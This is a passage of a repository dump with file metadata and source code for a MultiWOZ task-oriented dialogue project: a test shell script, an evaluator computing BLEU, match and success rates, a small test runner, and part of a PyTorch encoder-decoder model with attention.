(None, None)\n file_path = '{}/train_dials.json'.format(data_dir)\n train_loader = 
get_loader(file_path, input_lang_word2index, output_lang_word2index, intent_type, intent2index)\n for data in train_loader:\n print(data)\n\n" }, { "alpha_fraction": 0.7092198729515076, "alphanum_fraction": 0.716312050819397, "avg_line_length": 27.399999618530273, "blob_id": "c555dca22a319d01c6283413f935c3ce8e51b5ea", "content_id": "50aed7d4d2c26a15461aa9219142b99596bff514", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 141, "license_type": "no_license", "max_line_length": 49, "num_lines": 5, "path": "/test.sh", "repo_name": "Jiahuan-Pei/multiwoz-mdrg", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\nmkdir -p logs\nsource activate multiwoz\nTIMESTAMP=`date \"+%Y%m%d%H%M%S\"`\npython2 -u test.py >> logs/laptop-$TIMESTAMP.test" }, { "alpha_fraction": 0.5254557132720947, "alphanum_fraction": 0.5391807556152344, "avg_line_length": 39.620208740234375, "blob_id": "1b3afb46d21aba2ac0b847dd4c21c6fb555d6d5d", "content_id": "da92de96cd3678fcd94a2b48f1192540baedb081", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 23315, "license_type": "no_license", "max_line_length": 147, "num_lines": 574, "path": "/models/evaluator.py", "repo_name": "Jiahuan-Pei/multiwoz-mdrg", "src_encoding": "UTF-8", "text": "import random\nimport sys\nsys.path.append('..')\nrandom.seed(111)\n\nfrom utils.dbPointer import queryResultVenues\nfrom utils.delexicalize import *\nfrom utils.nlp import *\n\ndomains = ['restaurant', 'hotel', 'attraction', 'train', 'taxi', 'hospital', 'police']\nrequestables = ['phone', 'address', 'postcode', 'reference', 'id']\n\n\ndef parseGoal(goal, d, domain):\n \"\"\"Parses user goal into dictionary format.\"\"\"\n goal[domain] = {}\n goal[domain] = {'informable': [], 'requestable': [], 'booking': []}\n if 'info' in d['goal'][domain]:\n if domain == 'train':\n # we consider dialogues only where train had to be booked!\n if 'book' in d['goal'][domain]:\n goal[domain]['requestable'].append('reference')\n if 'reqt' in d['goal'][domain]:\n if 'trainID' in d['goal'][domain]['reqt']:\n goal[domain]['requestable'].append('id')\n else:\n if 'reqt' in d['goal'][domain]:\n for s in d['goal'][domain]['reqt']: # addtional requests:\n if s in ['phone', 'address', 'postcode', 'reference', 'id']:\n # ones that can be easily delexicalized\n goal[domain]['requestable'].append(s)\n if 'book' in d['goal'][domain]:\n goal[domain]['requestable'].append(\"reference\")\n\n goal[domain][\"informable\"] = d['goal'][domain]['info']\n if 'book' in d['goal'][domain]:\n goal[domain][\"booking\"] = d['goal'][domain]['book']\n\n return goal\n\n# dialouges is a dict of list, each list consists of generated responses\ndef evaluateModel(dialogues, val_dials, delex_path, mode='Valid'):\n \"\"\"Gathers statistics for the whole sets.\"\"\"\n fin1 = open(delex_path, 'r')\n delex_dialogues = json.load(fin1)\n successes, matches = 0, 0\n total = 0\n\n gen_stats = {'restaurant': [0, 0, 0], 'hotel': [0, 0, 0], 'attraction': [0, 0, 0], 'train': [0, 0,0], 'taxi': [0, 0, 0],\n 'hospital': [0, 0, 0], 'police': [0, 0, 0]}\n sng_gen_stats = {'restaurant': [0, 0, 0], 'hotel': [0, 0, 0], 'attraction': [0, 0, 0], 'train': [0, 0, 0],\n 'taxi': [0, 0, 0],\n 'hospital': [0, 0, 0], 'police': [0, 0, 0]}\n\n for filename, dial in dialogues.items():\n data = delex_dialogues[filename]\n\n goal, _, _, requestables, _ = evaluateRealDialogue(data, filename) # ground truth\n\n success, match, stats = evaluateGeneratedDialogue(dial, goal, 
data, requestables)\n\n successes += success\n matches += match\n total += 1\n\n for domain in gen_stats.keys():\n gen_stats[domain][0] += stats[domain][0]\n gen_stats[domain][1] += stats[domain][1]\n gen_stats[domain][2] += stats[domain][2]\n\n if 'SNG' in filename:\n for domain in gen_stats.keys():\n sng_gen_stats[domain][0] += stats[domain][0]\n sng_gen_stats[domain][1] += stats[domain][1]\n sng_gen_stats[domain][2] += stats[domain][2]\n\n # BLUE SCORE\n corpus = []\n model_corpus = []\n bscorer = BLEUScorer()\n\n count_wrong_len = 0\n for dialogue in dialogues:\n data = val_dials[dialogue]\n model_turns, corpus_turns = [], []\n for idx, turn in enumerate(data['sys']):\n corpus_turns.append([turn])\n for turn in dialogues[dialogue]:\n model_turns.append([turn])\n\n if len(model_turns) == len(corpus_turns):\n corpus.extend(corpus_turns)\n model_corpus.extend(model_turns)\n else:\n count_wrong_len += 1\n print('wrong length!!!')\n # print(model_turns)\n if count_wrong_len:\n print('count_wrong_len_ratio={}/{}'.format(count_wrong_len, len(dialogues)))\n # Print results\n try:\n BLEU = bscorer.score(model_corpus, corpus)\n MATCHES = (matches / float(total) * 100)\n SUCCESS = (successes / float(total) * 100)\n SCORE = 0.5 * MATCHES + 0.5 * SUCCESS + 100 * BLEU\n print('%s BLEU: %.4f' % (mode, BLEU))\n print('%s Matches: %2.2f%%' % (mode, MATCHES))\n print('%s Success: %2.2f%%' % (mode, SUCCESS))\n print('%s Score: %.4f' % (mode, SCORE))\n print('%s Dialogues: %s' % (mode, total))\n return BLEU, MATCHES, SUCCESS, SCORE, total\n except:\n print('SCORE ERROR')\n\ndef evaluateModelOnIntent(dialogues, val_dials, delex_path, intent, mode='Valid'):\n \"\"\"Gathers statistics for the whole sets.\"\"\"\n try:\n fin1 = open(delex_path, 'r')\n except:\n print('cannot find the delex file!=', delex_path)\n delex_dialogues = json.load(fin1)\n successes, matches = 0, 0\n total = 0\n total_turns = 0\n total_dials = 0\n\n gen_stats = {'restaurant': [0, 0, 0], 'hotel': [0, 0, 0], 'attraction': [0, 0, 0], 'train': [0, 0,0], 'taxi': [0, 0, 0],\n 'hospital': [0, 0, 0], 'police': [0, 0, 0]}\n sng_gen_stats = {'restaurant': [0, 0, 0], 'hotel': [0, 0, 0], 'attraction': [0, 0, 0], 'train': [0, 0, 0],\n 'taxi': [0, 0, 0],\n 'hospital': [0, 0, 0], 'police': [0, 0, 0]}\n\n for filename, dial in dialogues.items():\n data = delex_dialogues[filename]\n\n goal, _, _, requestables, _ = evaluateRealDialogue(data, filename)\n\n # filter goal & requestbles using domain\n new_goal = {}; new_req = {}\n for g in goal:\n if intent.lower() in g:\n new_goal[g] = goal[g]\n for r in requestables:\n if intent.lower() in r:\n new_req[r]=requestables[r]\n\n success, match, stats = evaluateGeneratedDialogue(dial, new_goal, data, new_req)\n\n successes += success\n matches += match\n total += 1\n\n\n for domain in gen_stats.keys():\n gen_stats[domain][0] += stats[domain][0]\n gen_stats[domain][1] += stats[domain][1]\n gen_stats[domain][2] += stats[domain][2]\n\n\n if 'SNG' in filename:\n for domain in gen_stats.keys():\n sng_gen_stats[domain][0] += stats[domain][0]\n sng_gen_stats[domain][1] += stats[domain][1]\n sng_gen_stats[domain][2] += stats[domain][2]\n\n # BLUE SCORE\n corpus = []\n model_corpus = []\n bscorer = BLEUScorer()\n\n count_wrong_len = 0\n for dialogue in dialogues:\n data = val_dials[dialogue]\n model_turns, corpus_turns = [], []\n flag = False\n if len(data['sys']) == len(dialogues[dialogue]):\n for idx, turn in enumerate(data['sys']):\n act = data['acts'][idx] # for different intents\n holding_intents = 
[a.split('-')[0] for a in act]\n model_turn = dialogues[dialogue][idx]\n if intent in holding_intents:\n corpus_turns.append([turn])\n model_turns.append([model_turn])\n total_turns += 1\n flag = True\n corpus.extend(corpus_turns)\n model_corpus.extend(model_turns)\n else:\n count_wrong_len += 1\n print('wrong length!!!')\n\n if flag:\n total_dials +=1\n\n if count_wrong_len:\n print('count_wrong_len_ratio={}/{}'.format(count_wrong_len, len(dialogues)))\n # Print results\n try:\n BLEU = bscorer.score(model_corpus, corpus)\n MATCHES = (matches / float(total) * 100)\n SUCCESS = (successes / float(total) * 100)\n SCORE = 0.5 * MATCHES + 0.5 * SUCCESS + 100 * BLEU\n print('%s BLEU: %.4f' % (mode, BLEU))\n print('%s Matches: %2.2f%%' % (mode, MATCHES))\n print('%s Success: %2.2f%%' % (mode, SUCCESS))\n print('%s Score: %.4f' % (mode, SCORE))\n print('%s Dialogues: %s' % (mode, total_dials))\n print('%s Turns: %s' % (mode, total_turns))\n return BLEU, MATCHES, SUCCESS, SCORE, total\n except:\n print('SCORE ERROR')\n\ndef evaluateGeneratedDialogue(dialog, goal, realDialogue, real_requestables):\n \"\"\"Evaluates the dialogue created by the models.\n First we load the user goal of the dialogue, then for each turn\n generated by the system we look for key-words.\n For the Inform rate we look whether the entity was proposed.\n For the Success rate we look for requestables slots\"\"\"\n # for computing corpus success\n requestables = ['phone', 'address', 'postcode', 'reference', 'id']\n\n # CHECK IF MATCH HAPPENED\n provided_requestables = {}\n venue_offered = {}\n domains_in_goal = []\n\n for domain in goal.keys():\n venue_offered[domain] = []\n provided_requestables[domain] = []\n domains_in_goal.append(domain)\n\n for t, sent_t in enumerate(dialog):\n for domain in goal.keys():\n # for computing success\n if '[' + domain + '_name]' in sent_t or '_id' in sent_t:\n if domain in ['restaurant', 'hotel', 'attraction', 'train']:\n # HERE YOU CAN PUT YOUR BELIEF STATE ESTIMATION\n venues = queryResultVenues(domain, realDialogue['log'][t*2 + 1])\n\n # if venue has changed\n if len(venue_offered[domain]) == 0 and venues:\n venue_offered[domain] = random.sample(venues, 1)\n else:\n flag = False\n for ven in venues:\n if venue_offered[domain][0] == ven:\n flag = True\n break\n if not flag and venues: # sometimes there are no results so sample won't work\n # print venues\n venue_offered[domain] = random.sample(venues, 1)\n else: # not limited so we can provide one\n venue_offered[domain] = '[' + domain + '_name]'\n\n # ATTENTION: assumption here - we didn't provide phone or address twice! 
etc\n for requestable in requestables:\n if requestable == 'reference':\n if domain + '_reference' in sent_t:\n if 'restaurant_reference' in sent_t:\n if realDialogue['log'][t * 2]['db_pointer'][-5] == 1: # if pointer was allowing for that?\n provided_requestables[domain].append('reference')\n\n elif 'hotel_reference' in sent_t:\n if realDialogue['log'][t * 2]['db_pointer'][-3] == 1: # if pointer was allowing for that?\n provided_requestables[domain].append('reference')\n\n elif 'train_reference' in sent_t:\n if realDialogue['log'][t * 2]['db_pointer'][-1] == 1: # if pointer was allowing for that?\n provided_requestables[domain].append('reference')\n\n else:\n provided_requestables[domain].append('reference')\n else:\n if domain + '_' + requestable + ']' in sent_t:\n provided_requestables[domain].append(requestable)\n\n # if name was given in the task\n for domain in goal.keys():\n # if name was provided for the user, the match is being done automatically\n if 'info' in realDialogue['goal'][domain]:\n if 'name' in realDialogue['goal'][domain]['info']:\n venue_offered[domain] = '[' + domain + '_name]'\n\n # special domains - entity does not need to be provided\n if domain in ['taxi', 'police', 'hospital']:\n venue_offered[domain] = '[' + domain + '_name]'\n\n\n if domain == 'train':\n if not venue_offered[domain]:\n if 'reqt' in realDialogue['goal'][domain] and 'id' not in realDialogue['goal'][domain]['reqt']:\n venue_offered[domain] = '[' + domain + '_name]'\n\n \"\"\"\n Given all inform and requestable slots\n we go through each domain from the user goal\n and check whether right entity was provided and\n all requestable slots were given to the user.\n The dialogue is successful if that's the case for all domains.\n \"\"\"\n # HARD EVAL\n stats = {'restaurant': [0, 0, 0], 'hotel': [0, 0, 0], 'attraction': [0, 0, 0], 'train': [0, 0,0], 'taxi': [0, 0, 0],\n 'hospital': [0, 0, 0], 'police': [0, 0, 0]}\n\n match = 0\n success = 0\n # MATCH\n for domain in goal.keys():\n match_stat = 0\n if domain in ['restaurant', 'hotel', 'attraction', 'train']:\n goal_venues = queryResultVenues(domain, goal[domain]['informable'], real_belief=True)\n if type(venue_offered[domain]) is str and '_name' in venue_offered[domain]:\n match += 1\n match_stat = 1\n elif len(venue_offered[domain]) > 0 and venue_offered[domain][0] in goal_venues:\n match += 1\n match_stat = 1\n else:\n if domain + '_name]' in venue_offered[domain]:\n match += 1\n match_stat = 1\n\n stats[domain][0] = match_stat\n stats[domain][2] = 1\n\n if match == len(goal.keys()):\n match = 1\n else:\n match = 0\n\n # SUCCESS\n if match:\n for domain in domains_in_goal:\n success_stat = 0\n domain_success = 0\n if len(real_requestables[domain]) == 0:\n success += 1\n success_stat = 1\n stats[domain][1] = success_stat\n continue\n # if values in sentences are super set of requestables\n for request in set(provided_requestables[domain]):\n if request in real_requestables[domain]:\n domain_success += 1\n\n if domain_success >= len(real_requestables[domain]):\n success += 1\n success_stat = 1\n\n stats[domain][1] = success_stat\n\n # final eval\n if success >= len(real_requestables):\n success = 1\n else:\n success = 0\n\n #rint requests, 'DIFF', requests_real, 'SUCC', success\n return success, match, stats\n\ndef evaluateRealDialogue(dialog, filename):\n \"\"\"Evaluation of the real dialogue.\n First we loads the user goal and then go through the dialogue history.\n Similar to evaluateGeneratedDialogue above.\"\"\"\n domains = ['restaurant', 'hotel', 
'attraction', 'train', 'taxi', 'hospital', 'police']\n requestables = ['phone', 'address', 'postcode', 'reference', 'id']\n\n # get the list of domains in the goal\n domains_in_goal = []\n goal = {}\n for domain in domains:\n if dialog['goal'][domain]:\n goal = parseGoal(goal, dialog, domain)\n domains_in_goal.append(domain)\n\n # compute corpus success\n real_requestables = {}\n provided_requestables = {}\n venue_offered = {}\n for domain in goal.keys():\n provided_requestables[domain] = []\n venue_offered[domain] = []\n real_requestables[domain] = goal[domain]['requestable']\n\n # iterate each turn\n m_targetutt = [turn['text'] for idx, turn in enumerate(dialog['log']) if idx % 2 == 1]\n for t in range(len(m_targetutt)):\n for domain in domains_in_goal:\n sent_t = m_targetutt[t]\n # for computing match - where there are limited entities\n if domain + '_name' in sent_t or '_id' in sent_t:\n if domain in ['restaurant', 'hotel', 'attraction', 'train']:\n # HERE YOU CAN PUT YOUR BELIEF STATE ESTIMATION\n venues = queryResultVenues(domain, dialog['log'][t * 2 + 1])\n\n # if venue has changed\n if len(venue_offered[domain]) == 0 and venues:\n venue_offered[domain] = random.sample(venues, 1)\n else:\n flag = False\n for ven in venues:\n if venue_offered[domain][0] == ven:\n flag = True\n break\n if not flag and venues: # sometimes there are no results so sample won't work\n #print venues\n venue_offered[domain] = random.sample(venues, 1)\n else: # not limited so we can provide one\n venue_offered[domain] = '[' + domain + '_name]'\n\n for requestable in requestables:\n # check if reference could be issued\n if requestable == 'reference':\n if domain + '_reference' in sent_t:\n if 'restaurant_reference' in sent_t:\n if dialog['log'][t * 2]['db_pointer'][-5] == 1: # if pointer was allowing for that?\n provided_requestables[domain].append('reference')\n\n elif 'hotel_reference' in sent_t:\n if dialog['log'][t * 2]['db_pointer'][-3] == 1: # if pointer was allowing for that?\n provided_requestables[domain].append('reference')\n\n #return goal, 0, match, real_requestables\n elif 'train_reference' in sent_t:\n if dialog['log'][t * 2]['db_pointer'][-1] == 1: # if pointer was allowing for that?\n provided_requestables[domain].append('reference')\n\n else:\n provided_requestables[domain].append('reference')\n else:\n if domain + '_' + requestable in sent_t:\n provided_requestables[domain].append(requestable)\n\n # offer was made?\n for domain in domains_in_goal:\n # if name was provided for the user, the match is being done automatically\n if 'info' in dialog['goal'][domain]:\n if 'name' in dialog['goal'][domain]['info']:\n venue_offered[domain] = '[' + domain + '_name]'\n\n # special domains - entity does not need to be provided\n if domain in ['taxi', 'police', 'hospital']:\n venue_offered[domain] = '[' + domain + '_name]'\n\n # if id was not requested but train was found we dont want to override it to check if we booked the right train\n if domain == 'train' and (not venue_offered[domain] and 'id' not in goal['train']['requestable']):\n venue_offered[domain] = '[' + domain + '_name]'\n\n # HARD (0-1) EVAL\n stats = {'restaurant': [0, 0, 0], 'hotel': [0, 0, 0], 'attraction': [0, 0, 0], 'train': [0, 0,0], 'taxi': [0, 0, 0],\n 'hospital': [0, 0, 0], 'police': [0, 0, 0]}\n\n match, success = 0, 0\n # MATCH\n for domain in goal.keys():\n match_stat = 0\n if domain in ['restaurant', 'hotel', 'attraction', 'train']:\n goal_venues = queryResultVenues(domain, dialog['goal'][domain]['info'], real_belief=True)\n 
#print(goal_venues)\n if type(venue_offered[domain]) is str and '_name' in venue_offered[domain]:\n match += 1\n match_stat = 1\n elif len(venue_offered[domain]) > 0 and venue_offered[domain][0] in goal_venues:\n match += 1\n match_stat = 1\n\n else:\n if domain + '_name' in venue_offered[domain]:\n match += 1\n match_stat = 1\n\n stats[domain][0] = match_stat\n stats[domain][2] = 1\n\n if match == len(goal.keys()):\n match = 1\n else:\n match = 0\n\n # SUCCESS\n if match:\n for domain in domains_in_goal:\n domain_success = 0\n success_stat = 0\n if len(real_requestables[domain]) == 0:\n # check that\n success += 1\n success_stat = 1\n stats[domain][1] = success_stat\n continue\n # if values in sentences are super set of requestables\n for request in set(provided_requestables[domain]):\n if request in real_requestables[domain]:\n domain_success += 1\n\n if domain_success >= len(real_requestables[domain]):\n success +=1\n success_stat = 1\n\n stats[domain][1] = success_stat\n\n # final eval\n if success >= len(real_requestables):\n success = 1\n else:\n success = 0\n\n return goal, success, match, real_requestables, stats\n\ndef evaluateModelGivenFile(gen_path, ref_path):\n with open(ref_path, 'r') as ref, open(gen_path, 'r') as gen:\n ref_dialogues = json.load(ref)\n gen_dialogues = {}\n for k, v in json.load(gen).items():\n gen_dialogues[k] = v['sys']\n delex_path = 'data/multi-woz/delex.json'\n evaluateModel(gen_dialogues, ref_dialogues, delex_path, mode='Test')\n return\n\n# use the open source evaluation for nlg-eval https://github.com/Maluuba/nlg-eval\ndef evaluateNLG(gen_dials, ref_dialogues):\n hyp_list, ref_list = [], []\n for fname in gen_dials:\n hyp_list.extend(gen_dials[fname]) # list of sentence string\n ref_list.extend([s.strip() for s in ref_dialogues[fname]['sys']]) # list of ref_list, each ref_list is a list of sentence string\n ref_lists = [ref_list] # only put 1 reference\n\n from nlgeval import NLGEval\n nlgeval = NLGEval() # loads the models\n metrics_dict = nlgeval.compute_metrics(ref_list=ref_lists, hyp_list=hyp_list)\n print(metrics_dict)\n return metrics_dict\n\ndef evaluateNLGFile(gen_dials_fpath, ref_dialogues_fpath):\n with open(gen_dials_fpath, 'r') as gen, open(ref_dialogues_fpath, 'r') as ref:\n gen_dials = json.load(gen)\n ref_dialogues = json.load(ref)\n\n hyp_list, ref_list = [], []\n for fname in gen_dials:\n hyp_list.extend(gen_dials[fname]) # list of sentence string\n ref_list.extend([s.strip() for s in ref_dialogues[fname]['sys']]) # list of ref_list, each ref_list is a list of sentence string\n ref_lists = [ref_list] # only put 1 reference\n\n from nlgeval import NLGEval\n nlgeval = NLGEval() # loads the models\n metrics_dict = nlgeval.compute_metrics(ref_list=ref_lists, hyp_list=hyp_list)\n print(metrics_dict)\n return metrics_dict\n\ndef evaluateNLGFiles(gen_dials_fpaths, ref_dialogues_fpath):\n from nlgeval import NLGEval\n nlgeval = NLGEval() # loads the models\n\n with open(ref_dialogues_fpath, 'r') as ref:\n ref_dialogues = json.load(ref)\n\n for path in gen_dials_fpaths:\n with open(path, 'r') as gen:\n gen_dials = json.load(gen)\n\n hyp_list, ref_list = [], []\n for fname in gen_dials:\n hyp_list.extend(gen_dials[fname]) # list of sentence string\n ref_list.extend([s.strip() for s in ref_dialogues[fname]['sys']]) # list of ref_list, each ref_list is a list of sentence string\n ref_lists = [ref_list] # only put 1 reference\n\n metrics_dict = nlgeval.compute_metrics(ref_list=ref_lists, hyp_list=hyp_list)\n print(path)\n print(metrics_dict)\n\nif 
__name__ == '__main__':\n pass\n # evaluteNLGFiles(gen_dials_fpath='results/bsl_20190510161309/data/test_dials/test_dials_gen.json', ref_dialogues_fpath='data/test_dials.json')" }, { "alpha_fraction": 0.6478751301765442, "alphanum_fraction": 0.677363395690918, "avg_line_length": 31, "blob_id": "86b9081630fa62e582d921bd3cd60e374eb75650", "content_id": "41084fd15a16e39130727f852a24a5332b961ba6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1153, "license_type": "no_license", "max_line_length": 85, "num_lines": 35, "path": "/multiwoz/Test.py", "repo_name": "Jiahuan-Pei/multiwoz-mdrg", "src_encoding": "UTF-8", "text": "from multiwoz.Evaluators import *\r\n\r\nrandom.seed(1)\r\n\r\n# diag={}\r\n# for filename, dialogues in json.load(open('data/test_dials.json')).items():\r\n# diag[filename] = dialogues['sys']\r\n# evaluateModel(diag, json.load(open('data/test_dials.json')), mode='test')\r\n\r\nevaluator=MultiWozEvaluator('MultiWozEvaluator')\r\n\r\ndiag={}\r\n# for filename, dialogues in evaluator.delex_dialogues.items():\r\n# one_diag=[]\r\n# for t, sent_t in enumerate(dialogues['log']):\r\n# if t%2==1:\r\n# one_diag.append(sent_t['text'])\r\n# diag[filename]=one_diag\r\n\r\n# print(evaluator.evaluate_match_success(evaluator.delex_dialogues, mode='rollout'))\r\n# random.seed(1)\r\n\r\nfor filename, dialogues in json.load(open('data/multi-woz/test_dials.json')).items():\r\n diag[filename] = dialogues['sys']\r\nevaluator.summarize_report(diag)\r\n\r\npath_bsl = 'results/test_dials_gen(bsl_m2_20190510161318).json'\r\npath_moe = 'results/test_dials_gen(moe1_20190510165545).json'\r\nwith open(path_bsl) as fr:\r\n print(path_bsl)\r\n evaluator.summarize_report(json.load(fr))\r\n\r\nwith open(path_moe) as fr:\r\n print(path_moe)\r\n evaluator.summarize_report(json.load(fr))" }, { "alpha_fraction": 0.5650963187217712, "alphanum_fraction": 0.5758068561553955, "avg_line_length": 46.17545700073242, "blob_id": "e11d5021f3e3159d2cd140da2b99aebce4f73b7e", "content_id": "aa9d63ec3e7b5eab292638af60ffc216b979ab1f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 49204, "license_type": "no_license", "max_line_length": 208, "num_lines": 1043, "path": "/models/model.py", "repo_name": "Jiahuan-Pei/multiwoz-mdrg", "src_encoding": "UTF-8", "text": "from __future__ import division, print_function, unicode_literals\n\nimport json\nimport math\nimport operator\nimport os\nimport random\nfrom io import open\nfrom queue import PriorityQueue # for py3\nfrom functools import reduce # for py3\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch import optim\n\nimport models.policy as policy\n# pp added: used for PriorityQueue python3, add an extra para in .put() method\nfrom itertools import count\n\nunique = count()\n\nfrom utils.util import SOS_token, EOS_token, PAD_token, detected_device\n\nPAD_model = 0 # used for set 0 elements in tensor\ndefault_device = detected_device\n\n\n# SOS_token = 0\n# EOS_token = 1\n# UNK_token = 2\n# PAD_token = 3\n# use_moe_loss = True # inner models weighting loss\n# learn_loss_weight = True\n# use_moe_model = True # inner models structure partition\n#\n# pp added\n# @total_ordering\n# class PriorityElem:\n# def __init__(self, elem_to_wrap):\n# self.wrapped_elem = elem_to_wrap\n#\n# def __lt__(self, other):\n# return self.wrapped_elem.priority < other.wrapped_elem.priority\n\n# Shawn beam search decoding\nclass 
BeamSearchNode(object):\n def __init__(self, h, prevNode, wordid, logp, leng):\n self.h = h\n self.prevNode = prevNode\n self.wordid = wordid\n self.logp = logp\n self.leng = leng\n\n def eval(self, repeatPenalty, tokenReward, scoreTable, alpha=1.0):\n reward = 0\n alpha = 1.0\n\n return self.logp / float(self.leng - 1 + 1e-6) + alpha * reward\n\n\ndef init_lstm(cell, gain=1):\n init_gru(cell, gain)\n\n # positive forget gate bias (Jozefowicz et al., 2015)\n for _, _, ih_b, hh_b in cell.all_weights:\n l = len(ih_b)\n ih_b[l // 4:l // 2].data.fill_(1.0)\n hh_b[l // 4:l // 2].data.fill_(1.0)\n\n\ndef init_gru(gru, gain=1):\n gru.reset_parameters()\n for _, hh, _, _ in gru.all_weights:\n for i in range(0, hh.size(0), gru.hidden_size):\n torch.nn.init.orthogonal_(hh[i:i + gru.hidden_size], gain=gain)\n\n\ndef whatCellType(input_size, hidden_size, cell_type, dropout_rate):\n if cell_type == 'rnn':\n cell = nn.RNN(input_size, hidden_size, dropout=dropout_rate, batch_first=False)\n init_gru(cell)\n return cell\n elif cell_type == 'gru':\n cell = nn.GRU(input_size, hidden_size, dropout=dropout_rate, batch_first=False)\n init_gru(cell)\n return cell\n elif cell_type == 'lstm':\n cell = nn.LSTM(input_size, hidden_size, dropout=dropout_rate, batch_first=False)\n init_lstm(cell)\n return cell\n elif cell_type == 'bigru':\n cell = nn.GRU(input_size, hidden_size, bidirectional=True, dropout=dropout_rate, batch_first=False)\n init_gru(cell)\n return cell\n elif cell_type == 'bilstm':\n cell = nn.LSTM(input_size, hidden_size, bidirectional=True, dropout=dropout_rate, batch_first=False)\n init_lstm(cell)\n return cell\n\n\nclass EncoderRNN(nn.Module):\n def __init__(self, input_size, embedding_size, hidden_size, cell_type, depth, dropout, device=default_device):\n super(EncoderRNN, self).__init__()\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.embed_size = embedding_size\n self.n_layers = depth\n self.dropout = dropout\n self.bidirectional = False\n if 'bi' in cell_type:\n self.bidirectional = True\n padding_idx = 3\n self.embedding = nn.Embedding(input_size, embedding_size, padding_idx=padding_idx)\n # self.embedding = nn.Embedding(400, embedding_size, padding_idx=padding_idx)\n self.rnn = whatCellType(embedding_size, hidden_size,\n cell_type, dropout_rate=self.dropout)\n self.device = device\n\n def forward(self, input_seqs, input_lens, hidden=None):\n \"\"\"\n forward procedure. 
**No need for inputs to be sorted**\n :param input_seqs: Variable of [T,B]\n :param hidden:\n :param input_lens: *numpy array* of len for each input sequence\n :return:\n \"\"\"\n input_lens = np.asarray(input_lens)\n input_seqs = input_seqs.transpose(0, 1)\n # batch_size = input_seqs.size(1)\n embedded = self.embedding(input_seqs)\n embedded = embedded.transpose(0, 1) # [B,T,E]\n sort_idx = np.argsort(-input_lens)\n # pp added\n unsort_idx = np.argsort(sort_idx)\n # unsort_idx = torch.LongTensor(np.argsort(sort_idx))\n input_lens = input_lens[sort_idx]\n # sort_idx = torch.LongTensor(sort_idx)\n embedded = embedded[sort_idx].transpose(0, 1) # [T,B,E]\n packed = torch.nn.utils.rnn.pack_padded_sequence(embedded, input_lens)\n outputs, hidden = self.rnn(packed, hidden)\n outputs, _ = torch.nn.utils.rnn.pad_packed_sequence(outputs)\n if self.bidirectional:\n outputs = outputs[:, :, :self.hidden_size] + outputs[:, :, self.hidden_size:]\n\n outputs = outputs.transpose(0, 1)[unsort_idx].transpose(0, 1).contiguous()\n\n if isinstance(hidden, tuple):\n hidden = list(hidden)\n hidden[0] = hidden[0].transpose(0, 1)[unsort_idx].transpose(0, 1).contiguous()\n hidden[1] = hidden[1].transpose(0, 1)[unsort_idx].transpose(0, 1).contiguous()\n hidden = tuple(hidden)\n else:\n hidden = hidden.transpose(0, 1)[unsort_idx].transpose(0, 1).contiguous()\n\n return outputs, hidden\n\n\nclass Attn(nn.Module):\n def __init__(self, method, hidden_size, device=default_device):\n super(Attn, self).__init__()\n self.method = method\n self.hidden_size = hidden_size\n self.attn = nn.Linear(self.hidden_size * 2, hidden_size)\n self.v = nn.Parameter(torch.rand(hidden_size))\n stdv = 1. / math.sqrt(self.v.size(0))\n self.v.data.normal_(mean=0, std=stdv)\n self.device = device\n\n def forward(self, hidden, encoder_outputs):\n '''\n :param hidden:\n previous hidden state of the decoder, in shape (layers*directions,B,H)\n :param encoder_outputs:\n encoder outputs from Encoder, in shape (T,B,H)\n :return\n attention energies in shape (B,T)\n '''\n max_len = encoder_outputs.size(0)\n\n H = hidden.repeat(max_len, 1, 1).transpose(0, 1)\n encoder_outputs = encoder_outputs.transpose(0, 1) # [T,B,H] -> [B,T,H]\n attn_energies = self.score(H, encoder_outputs) # compute attention score\n return F.softmax(attn_energies, dim=1).unsqueeze(1) # normalize with softmax\n\n def score(self, hidden, encoder_outputs):\n cat = torch.cat([hidden, encoder_outputs], 2)\n energy = torch.tanh(self.attn(cat)) # [B*T*2H]->[B*T*H]\n energy = energy.transpose(2, 1) # [B*H*T]\n v = self.v.repeat(encoder_outputs.data.shape[0], 1).unsqueeze(1) # [B*1*H]\n energy = torch.bmm(v, energy) # [B*1*T]\n return energy.squeeze(1) # [B*T]\n\n\nclass SeqAttnDecoderRNN(nn.Module):\n def __init__(self, embedding_size, hidden_size, output_size, cell_type, dropout_p=0.1, max_length=30,\n device=default_device):\n super(SeqAttnDecoderRNN, self).__init__()\n # Define parameters\n self.hidden_size = hidden_size\n self.embed_size = embedding_size\n self.output_size = output_size\n self.n_layers = 1\n self.dropout_p = dropout_p\n self.device = device\n\n # Define layers\n self.embedding = nn.Embedding(output_size, embedding_size)\n self.dropout = nn.Dropout(dropout_p)\n\n if 'bi' in cell_type: # we dont need bidirectionality in decoding\n cell_type = cell_type.strip('bi')\n self.rnn = whatCellType(embedding_size + hidden_size, hidden_size, cell_type, dropout_rate=self.dropout_p)\n self.out = nn.Linear(hidden_size, output_size)\n\n self.score = nn.Linear(self.hidden_size + 
self.hidden_size, self.hidden_size)\n self.attn_combine = nn.Linear(embedding_size + hidden_size, embedding_size)\n\n # attention\n self.method = 'concat'\n self.attn = nn.Linear(self.hidden_size * 2, hidden_size)\n self.v = nn.Parameter(torch.rand(hidden_size))\n stdv = 1. / math.sqrt(self.v.size(0))\n self.v.data.normal_(mean=0, std=stdv)\n\n def forward(self, input, hidden, encoder_outputs, mask_tensor=None):\n if isinstance(hidden, tuple):\n h_t = hidden[0]\n else:\n h_t = hidden\n encoder_outputs = encoder_outputs.transpose(0, 1)\n embedded = self.embedding(input) # .view(1, 1, -1)\n # embedded = F.dropout(embedded, self.dropout_p)\n\n # SCORE 3\n max_len = encoder_outputs.size(1)\n h_t = h_t.transpose(0, 1) # [1,B,D] -> [B,1,D]\n h_t = h_t.repeat(1, max_len, 1) # [B,1,D] -> [B,T,D]\n energy = self.attn(torch.cat((h_t, encoder_outputs), 2)) # [B,T,2D] -> [B,T,D]\n energy = torch.tanh(energy)\n energy = energy.transpose(2, 1) # [B,H,T]\n v = self.v.repeat(encoder_outputs.size(0), 1).unsqueeze(1) # [B,1,H]\n energy = torch.bmm(v, energy) # 